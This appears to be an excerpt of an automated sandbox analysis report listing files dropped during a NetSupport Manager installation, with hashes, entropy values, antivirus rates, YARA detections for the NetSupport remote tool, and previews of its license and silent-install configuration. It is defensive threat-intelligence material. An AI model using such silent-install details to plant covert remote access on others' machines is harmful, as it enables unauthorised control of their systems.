                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\IcoViewer.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):131
                                                                                                                    Entropy (8bit):5.227632116710512
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:zLTOM1Mrses+HVLrxoezM/nKrBFXcPKjcIWgxyGKLWskV:nTj1MrRscLlfg/K8PrJgxgeV
                                                                                                                    MD5:CE9AAC34D7FF9DBF6696BDB337285362
                                                                                                                    SHA1:F70BE3A3B0B7292EC7756E6E8705020019CADD79
                                                                                                                    SHA-256:081A72C5833E4392D02FF444E669770F1673996162844C5243050E44E02742A8
                                                                                                                    SHA-512:8904457CD1882C25B9CD98D7F5DE6CE4C0E40A3B3BB33DFF4E8E1D5011DF0E38AE937620F421C508170E72726109107F0572DE2FFCFD7F5C00AA6F983E3333F2
                                                                                                                    Malicious:false
                                                                                                                    Preview:...InventoryTime\UTCTime\0......CHardwareObject.1732325920.InventoryTime\Time\0...22 Nov 2024 20:38:40.ET\HotFixes...0.ET\Icons...0
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 1 x 20
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):831
                                                                                                                    Entropy (8bit):0.983335608654777
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:CBI/xi8M9C1Awcr02mxhl/E0ltrllwklE:wMc9CKwa0Rl/1lqklE
                                                                                                                    MD5:A2D88CFF615C867DD12ED7F2A0F4B307
                                                                                                                    SHA1:0BF04BDF015CF392AC7322200287482CA5BB4DE1
                                                                                                                    SHA-256:470801C93670F95D15D29D962E7903650F42B55EFF38DEBEDF76AF66E55D18F3
                                                                                                                    SHA-512:653B07F4D80D90E9730F6B1E405BEE77843A9FE2F9812B98642599CD441ACA3296FD2B6C8A25EBD68D4F981694E4AFDA6A4E7596091ED92496BFBA451E2CFA7A
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 10 x 20
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):847
                                                                                                                    Entropy (8bit):1.3936912447177485
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:CiIF3VdYF2tvfnug2A+HJaR85r02mxhl/E0ltrllIWzv12b/bVfe:zw4yGg2p0Rl/1lmy19
                                                                                                                    MD5:55E6FD2D853C73F3521420BF2A969DA7
                                                                                                                    SHA1:A45054111BF65155C586843B4CD40EA74E54C105
                                                                                                                    SHA-256:9513298F36610F67CF7D68559A2511B4CA35F93B84A648809C3EE381E2A3FCEA
                                                                                                                    SHA-512:C8B8BE6579566ADEB4096FC82057064E17DD3815059148D617C5B83A80B174A7C7849DF4ECCAA0C345B3193B9EDF5AFE7D9E748E8864C5FE142FEBA989BD4566
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 256 x 256
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):3600
                                                                                                                    Entropy (8bit):7.868516763778815
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:h+b+Hb7fTL37CCWf71dHoBbNVBqEjXOTbrPw6ASzi8y04dBrNNHbahN:h3f33uVf/HoBpVoErOvU6ry0ATN7AN
                                                                                                                    MD5:93997B1706AD63178B10429687E9B567
                                                                                                                    SHA1:A2D56AA4BDF21995E5B298E3B12DD76681617292
                                                                                                                    SHA-256:55C31D2A6EB40EB606AB3C0E65F98CC010AE9B8803E4553D8DB273944C8C0423
                                                                                                                    SHA-512:BCC3BD3D94FB50034EEC3D74C1F3AF1524CA485C4373DF7945A1CF259D03854F4EBE953D7BB70F4FB77A0924183853E4EEF807DC265172B06A32A680AF63A302
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 16 x 16
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):938
                                                                                                                    Entropy (8bit):2.8573986253171575
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:NzpsyX87KPbQBfO2/6jpywkVtiAoKgHQHt1Z39rvpmE:bev16VcH9gwNbhpmE
                                                                                                                    MD5:B373B4BDEE4E220D7515FBB293FB7224
                                                                                                                    SHA1:0C316664C0151093ED2A76C4C6285BA0835DDE74
                                                                                                                    SHA-256:59F6F5B3C98AFE90D4916C626D6459984AF3649B9F63F7BCE0925EAA49FBB1C2
                                                                                                                    SHA-512:CAAB966B209B9CD0D8818F9F91A99D3D2574EBD8F795B6E06EDA08AF3F2662DAB0DC319DC62656FE098557244037D148BE6C56FF1A88D08358BE90DC19744C15
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 14 x 13
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):891
                                                                                                                    Entropy (8bit):1.8494573303221005
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:mu8sPdPXrJ+l3Ozvn/lvW88B1lWqv/L9lUo/E:71/r4qFvWzd9E
                                                                                                                    MD5:220F33361D1D587C5899444C7B6C57CF
                                                                                                                    SHA1:53E9498570FA8DFFE491F4854104254EE395F9E7
                                                                                                                    SHA-256:163082A6F3992DC25B4B8848D2DB66A9E27CE7E6535B5F277DF119506CD1E4EA
                                                                                                                    SHA-512:FA336DB5835DA1FB5D943CBC40EEB8890B07BB14E5A2BB330F606500168C53661AC942C9148C1AB7EA6E656804D5E9F9C6832A4117DD1BFC165EEF502554D092
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 14 x 13
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):827
                                                                                                                    Entropy (8bit):1.2654828024465707
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:CABkulKFUFPtb9h4H9ee0XLylEJ+llt9YRka2b/rG:mu8sPdPXrJ+l3iRkaJ
                                                                                                                    MD5:6D7B88F8F540000104F86637B7A31E5B
                                                                                                                    SHA1:BB4D3765DA73CAF1B7CC2843EAE1106B3E67963F
                                                                                                                    SHA-256:104D7AD8EAFF36E019A84C3B18D1B37591D06D9C9841FF5B82310A800556EEC9
                                                                                                                    SHA-512:FBFA45CD58F55C0E745539014FCE0DDCDD913DA38F1AE5BAD7C2147FEF64E1DD585BB6411EC981D08AAA147B64BB6A93D2287A20719946CEBF4CDBB36695B269
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 14 x 13
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):891
                                                                                                                    Entropy (8bit):1.8451090876153475
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:CABkulKFUFPtb9h4H9ee0XLylEJ+llt9AzVFkmipnBIsRvssqy89sR1lfcTFEn:mu8sPdPXrJ+l3Ozvk2Ass0eR12K
                                                                                                                    MD5:78D2B10A120613047C691C679F165799
                                                                                                                    SHA1:6D3998780D06860C1589DFB2C0E826EFD86E05F3
                                                                                                                    SHA-256:CDA873D713E82B0E32020B393B3166A7E2E05DCEB7F8D269B4C64771888446BF
                                                                                                                    SHA-512:47EA9D750F7A5B1E22D92A35D870256BFC8045FCFC7D2B87E0E089820A6BBD71FF81F15F4877DDF3DD32C047747DD34DA47698441CAC82E62873876001378B9E
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 14 x 13
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):827
                                                                                                                    Entropy (8bit):1.2654828024465707
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:CABkulKFUFPtb9h4H9ee0XLylEJ+llt9YRka2b/rG:mu8sPdPXrJ+l3iRkaJ
                                                                                                                    MD5:6D7B88F8F540000104F86637B7A31E5B
                                                                                                                    SHA1:BB4D3765DA73CAF1B7CC2843EAE1106B3E67963F
                                                                                                                    SHA-256:104D7AD8EAFF36E019A84C3B18D1B37591D06D9C9841FF5B82310A800556EEC9
                                                                                                                    SHA-512:FBFA45CD58F55C0E745539014FCE0DDCDD913DA38F1AE5BAD7C2147FEF64E1DD585BB6411EC981D08AAA147B64BB6A93D2287A20719946CEBF4CDBB36695B269
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 256 x 256
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2574
                                                                                                                    Entropy (8bit):7.7150160845623175
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:bq5K+FBR57fTL377fTClBHG+6OnPMddPp6pZRIqSCrOV8snZAOgadLO+:bqLFFf33PfuPi8uvCrOGsGN4Ld
                                                                                                                    MD5:AA5557A8EA8F8AF1B223501E4CB02E4D
                                                                                                                    SHA1:39E7292B18779468700245B526364B06C8AF09C9
                                                                                                                    SHA-256:E1427F55EDB661FF70EB297F887410F73109BB6CF25592E0AC548C5F4D1B7AD8
                                                                                                                    SHA-512:24CF5B8525065AF3F07F8A82ED189383E7AFD7D9F2F8E74C3B45CC4ED504ECD751FFE5DE15C28A2715172DAC38AF4D5B1E3E41E55CFE20019C830AB2CB3A69DA
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 128 x 128
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):6416
                                                                                                                    Entropy (8bit):7.672789387563995
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:dof5Gc5nRjOhtX21I1cv8jecTgaTobE0Gqe+3DWcgEB5qD5nXLuIi4UvUCF8UyIt:c5/RKX2vvQW9G4DFgEjWUBZLMA
                                                                                                                    MD5:9C66D6A559E99539BE51D8B506937B03
                                                                                                                    SHA1:8B6CFBFD26E68832DBF190BCBA6ABAD7696D5B54
                                                                                                                    SHA-256:EC9C5DD2A41455755758BE16EE3B0FBC1173EE953F1B49D820FD68AC5B7FA9CC
                                                                                                                    SHA-512:769D72D56A0F2B580391440CF1E1808523D2286E9659005A7D4120C655EB504BD773F6DC223A3A9782D1B82779BA901AFEADF59701D5C8EAC61EFB89B51F07C7
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 256 x 256
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):6520
                                                                                                                    Entropy (8bit):7.841992508206522
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:LjnnfoGCriNQaG34T46tblxNC53jX3gp6JE:/nfok3Uo46tp653b3G6JE
                                                                                                                    MD5:F9F426CA807A7EEE268EEDAD685998A7
                                                                                                                    SHA1:777892BBA52A7914F5AC030A215FE536F1D850FF
                                                                                                                    SHA-256:DCEAC6EB086C02875C1F2A6221750A6B9E7C10E42D498106F4AE72AABE639321
                                                                                                                    SHA-512:C129EAB92CEDEF05FA1A772F0C8C93E5EDB01BCEF77A844F22EE648FDC79EE631A0687DC837FD07A8B75364339C0F38DE1DCA3DFBD1FD4E7E8382C5E473B6B0C
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 1 x 20
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):831
                                                                                                                    Entropy (8bit):0.972559746338926
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:CBI/VXVm/XFkMr02mxhl/E0ltrllQ6E:woXVm/B0Rl/1l1E
                                                                                                                    MD5:BA6A6D3669870D2DB7EDC67BBF3FF236
                                                                                                                    SHA1:3B3D0AB6731C4A146DD10BED4D06FC260657F059
                                                                                                                    SHA-256:A59009593867C1E9F6866A0BBD1E81B9D525A1844D0E2E8FC89DC92411DB00FA
                                                                                                                    SHA-512:A76BC5E20A7C71C64F398503BC34BE777115593DA56089D29F09FB1F5BA8A7FB22B5E190BBD56237DABC1F02838F3A5E7D322162C3A4800D255B541FE4CF5867
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 108 x 85
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):7876
                                                                                                                    Entropy (8bit):7.513291372804623
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:lY8I2A27bUw0r7Ro7cFjYLNT0vvqFZsI+8YrYn1XsjJmIXb:y8SobXORac+T0GZst8YrYn18ZL
                                                                                                                    MD5:1778BE96CF115F3207F976CC1064612B
                                                                                                                    SHA1:CFAC3B903F0E11E3263582EB3B1BFB4E6432CDE7
                                                                                                                    SHA-256:204A91AF35DD6F6CBAA6FC84D4AF48F78D3A56945526DEC0A27B4BCA6C1C4738
                                                                                                                    SHA-512:659AD463254D3522941744500670C527280A5173B25487BED82413885A9C67B2EB79C95897D256DA73D2C9D93D8FE7AD53DBF412D1E7BFAC7C223DEB37291A8D
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 256 x 256
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):4283
                                                                                                                    Entropy (8bit):7.821192064882651
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:WpJqWEsMxTm3h0CXoxYCPLMh3ACSf8IMCldhzGs:WpJyT8mAsdzG3Apf1MCvV
                                                                                                                    MD5:EC30AA4154A544FC9426051D0B91F90B
                                                                                                                    SHA1:0CCE9BBBCC46D51040B2102561FF9E59FC8390E9
                                                                                                                    SHA-256:1D2C086DBB986B6D7246864EBD9F8D265E7ABA98F79AE6E52A53C86F46EFC85F
                                                                                                                    SHA-512:4170304640A652F55C58787C4AAF0A18D6EC7C782A419EF0C0A11F2958FE950B3707D454FF92E0AEF85E7E279DAB5319E26285BA5D8D372FA400C83C7691398F
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 256 x 256
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2951
                                                                                                                    Entropy (8bit):7.881907377142764
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:j6pdPL2M8R95nbi6j7BCqR7eUP0Pg9DDe1EgOl6UXU7M1SIFI11sSaA4Ve:judT2Rs6j7hyUPNeK56UrjA40
                                                                                                                    MD5:DD3B10ADD893198C9159F2A4D0E7C534
                                                                                                                    SHA1:A3E1B3092E8BD0C89BF237D15104A2348C7AAC3C
                                                                                                                    SHA-256:588B76D2B41138AB4BC6EA53F6D7742A771488346F2AF1A854836524816F1126
                                                                                                                    SHA-512:B610D3290982FC6ADEF21A4053DA7C09EFAB2337BB8B68856DB58293AD509BCE89B93CFD2229CE9BCD6FFC0D4B14B0FCFBF9AD989583A2CC4AE02558D1250E3F
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 256 x 256
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2035
                                                                                                                    Entropy (8bit):7.88230344011226
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:FSo5FF/7f5vb7vgIsYIeUqVnV5sJDZaQnn9t5o7q8qr/W:8o5FNflb7gIPUqz5sJLn9t5V8qzW
                                                                                                                    MD5:9B1957B4A51144937F248740C26D24B8
                                                                                                                    SHA1:B06D1590071110A36E6A94B516E46818F73A797D
                                                                                                                    SHA-256:E2B717CA84391B8D2158E8029F1C24920180CC9FFB88616520B0E05CE521E528
                                                                                                                    SHA-512:A048AE98A57870AB67FC954F4E49DBA2534573DB3362BF2C28006FBA40B92526769DFC086BBBD1427BBAF1EB4629D19B5ECA2D87A088E8BCEE19DC8E1931B600
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 1 x 20
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):831
                                                                                                                    Entropy (8bit):0.9654320700764645
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:CBI/nExibw5laBr02mxhl/E0ltrllUklE:waERi0Rl/1lGklE
                                                                                                                    MD5:67B2128FB5228203D3CA1E746BF9C15D
                                                                                                                    SHA1:084C644983B44ABE7527E6B38390C0000C3F11CC
                                                                                                                    SHA-256:BE1B29D4F7699CD988FA1E6AB5255735BC4A53C02CD64ACF1BE345EE4EA5F800
                                                                                                                    SHA-512:137271AF0E21605E5F59F0786F0B22456EB660B2D8425364B2F036693546D56941CDF958B50DEAB04798C36AA27FBBF41ECBC6828CD5A796AF0605F23C457F4B
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 16 x 16
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):952
                                                                                                                    Entropy (8bit):3.3227002761893862
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:PacUfx/L7/elDHgVHhV9In1gFyEDZjJO73T9+K2ki:vw2lD8HX9In6y+Pa3R+97
                                                                                                                    MD5:0D0A3F569BE68B6046C02F739DDDAD52
                                                                                                                    SHA1:9C7A14C4DD671B4BDFC9EEFFE8478EF1A3E0C3BA
                                                                                                                    SHA-256:F4929A6F524DC3BD502C263C08E4F3DF238BE21512759E7C85B3C31A44C49CA8
                                                                                                                    SHA-512:CF45F36444BBE731674B19B5090008C3AAE968037CB516989455C1576FBA54AF5CCCED42CB28251383401CD55822A42EBF8A8A71DE3E6B9B8576501AA4A37286
                                                                                                                    Malicious:true
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 32 x 32
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):958
                                                                                                                    Entropy (8bit):3.837476529387128
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:3/ZIjXg3LZKOU5pImNVVN6UxKF8uT00NLkE:32jgMx5Kmrr6Ux1izL/
                                                                                                                    MD5:715C4A7A4ECB3C17856F3486067583B3
                                                                                                                    SHA1:860F26ED5F34D290EECFF0CFA7AD8DD8A0FE8318
                                                                                                                    SHA-256:E0DED6BD0DFA994E59786BC83CB62493F511B07F93CDE4305E88A3B1A8986862
                                                                                                                    SHA-512:ECD7A73F48F36F1F273DCF07DD1B294C43DAE974BD5BCFED60C8761CC1802176E3D4C00395454C824262E580E343C12C9866EBE4E0ED4DA6DF264B3817FBEC47
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 256 x 256
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1163
                                                                                                                    Entropy (8bit):7.788256448215719
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:Gek36A873hchk6lo7Cl1sx6LJXLs9eIavsAD3v3KF8lqeKmX:tkqA8DhUloS3VjIaz3v3oR2
                                                                                                                    MD5:1DE02006ADA71EEEEF52BDE607411092
                                                                                                                    SHA1:26224EAD28E087B0CB5AAD3A5CD584598407BA14
                                                                                                                    SHA-256:241E11F78B196CB96B742E901AC4B07014D9BE89C38FC51C26993E00EFA42464
                                                                                                                    SHA-512:3B37E775D6DE4C615B137D7F7DE75176B7AC9946BCFDF6FDB04D9A8F570D97EF6E564B4990D9390F8FBFFE7677730A0E786EF5CBBBCC2D10749FAF4736F1CACB
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):58336
                                                                                                                    Entropy (8bit):6.882094538107883
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:0sOCkVP/zMhlawzEDmAnomANKl49r2pe/TeHDHf/ckpvr2pe/DkqHDHf/cklON:0htcW+KlUee/SjHdjee/hjHhK
                                                                                                                    MD5:E06343CDA474C451258894E1AF0EA7B0
                                                                                                                    SHA1:9A02F031A278A3245272ECE1004D0BDD1F40F58D
                                                                                                                    SHA-256:83222B71D197592C717835F9DAEE81266BE6F47B67B0ED5C84CAEF25877E876B
                                                                                                                    SHA-512:824185904B08A17D8D2F139376F8BD0C622EF9D461881E117809CB14E043BD77E4A730A6C0E8F1A791DFF355214EB7B5D6F89B19E3271017547A63D7BCC9F731
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2419680
                                                                                                                    Entropy (8bit):4.698078733564096
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:OlRqzaIVAjheUC4PHYsDyl5+xAx8rSI/HhkSkJ2v7rz82ahdMbAK+p8q6JfXHWZO:4c1xUh85oY05Hhlmj9aZ
                                                                                                                    MD5:15ACD82C7402BC89F61F2A5E2B0C90EB
                                                                                                                    SHA1:068D37149E372F01EFEBC40B42BFD873AB9BCFF2
                                                                                                                    SHA-256:2B9673D6AB08AC2204D50A327D838047A6C64ACDAD765B887B3349D70C9CD307
                                                                                                                    SHA-512:287A0C23C97E1D557268160F40B6CAC533BFCF7515362C608D57D3DB797AF3499DC0276E775661005A2C8A64462579F8510DE9073FD245CC569516D6F15D0CB4
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClient32UI.exe, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):232416
                                                                                                                    Entropy (8bit):6.6458885862654755
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:l60wP+d9JCHANFegxoTRy212Te/giriLeIezEB:l6dE9MH8FegGTU20T8zxzQ
                                                                                                                    MD5:9B60C6DDFD1C4BC22007578132FDEE99
                                                                                                                    SHA1:462DE03AC21EBBAAB8C9A325C7DA8F82B50C6B0B
                                                                                                                    SHA-256:5ECC47AFFF0FC16009B369A9B5BB969F5DD36D47207BF2A6CF433903E74C216B
                                                                                                                    SHA-512:F106918649B42EEDB4262C0699FAF465296331990691C99BC16990BC66AB2E3FB6CEEB3FAAF978DE4A4329954BF37D9AB79CC368A08CD38035F4750CBF169217
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClientTB.exe, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):253
                                                                                                                    Entropy (8bit):5.069358624511852
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:Iyovk4xRPjwxVza1DKHMoEEjLgpW2MQDHZYpPM/io6K6a8l6i7s:IFR7wx9vJjjqW2M5PM/iovH8l6J
                                                                                                                    MD5:D2C2217861F5535686409D80A0867F6F
                                                                                                                    SHA1:F4D90BEBFCF8F501E5B9F0427028F696C3A191C7
                                                                                                                    SHA-256:AF9C79CF3AF6A7E969208DA78DFCFAC54D6F956545B46F434D0E447CFF94807B
                                                                                                                    SHA-512:656DEAC03F9D81792E3D78108FB7D6754CA4A21A30F0E8DA72E71F64B0B015DFC299D5478A8CC27ACB05A0EC7E01C2C1CFCC9EB40041E4FE0A790414E42B4A37
                                                                                                                    Malicious:false
                                                                                                                    Preview:1400..0x98f177db....; NetSupport License File...; Generated on 02:59 - 15/09/2022........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=NSM1234..maxslaves=9999..os2=1..product=10..serial_no=NSM1234..shrink_wrap=0..transport=0..
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:Generic INItialization configuration [Features]
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):6458
                                                                                                                    Entropy (8bit):4.645519507940197
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
                                                                                                                    MD5:88B1DAB8F4FD1AE879685995C90BD902
                                                                                                                    SHA1:3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
                                                                                                                    SHA-256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
                                                                                                                    SHA-512:4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
                                                                                                                    Malicious:false
                                                                                                                    Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):115168
                                                                                                                    Entropy (8bit):6.225008841780487
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:/oKKGZiiHapQXaPjALcunPsWjcdRCunjVpnAK9LXee/VujHNee/RjH0:wKKQ/KP8+RCuntxe2ujtesjU
                                                                                                                    MD5:27C16711A2025C061EA30E09F1BF6609
                                                                                                                    SHA1:308BF98A3E597B83D066B8F149E47C12FC487642
                                                                                                                    SHA-256:9159A0FFA498F379570478EC09479764FB8B7130E73B3C02F2FE7BD709B9B20C
                                                                                                                    SHA-512:9152A43977F82EAC69BD953F9B8D2FEB64C7102386736C8847A32A40D9DF82DCB6DBEA3FDE3D44835C6D03628124308CC240A9EB8456CBC44E6760F40A265D10
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSToast.exe, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):32224
                                                                                                                    Entropy (8bit):7.0841664339711
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:o52mnrr2pe/GJvHDHf/ckIYBpr2pe/G+HDHf/ckC:gPnfee/wjHx1ee/7jHW
                                                                                                                    MD5:907C8647640B41EB840DD3F8D5C0267E
                                                                                                                    SHA1:87D374852CEEB5AB41E6D39FD3B407E51B2BE6F7
                                                                                                                    SHA-256:4EE7811DFDF1ED46BD2D224B81B3FB0F5371FD5A4DB18358F052DA73316D9A99
                                                                                                                    SHA-512:B7F6CA82C5547CBA9259934DF8AE08BA706E4FB3E8DB10E1EEB44EDF00336C60BC7CD732BE113E11A321A657D30FC9F1B396A28B2342FD96682EA68147D303D6
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICHEK.DLL, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):9087968
                                                                                                                    Entropy (8bit):5.4923586433480756
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:49152:aZcDBXpzw67GUIZr7h4721VgP6la/o7TdT7ZbMa3kTaSh95Qn1RURG:KWIM7q2SAyqTaShAnAI
                                                                                                                    MD5:4BFB9DB4940644EAD940B6C3DB7B6C12
                                                                                                                    SHA1:48DC699DD2ABDD6562BB14B332C031439717A666
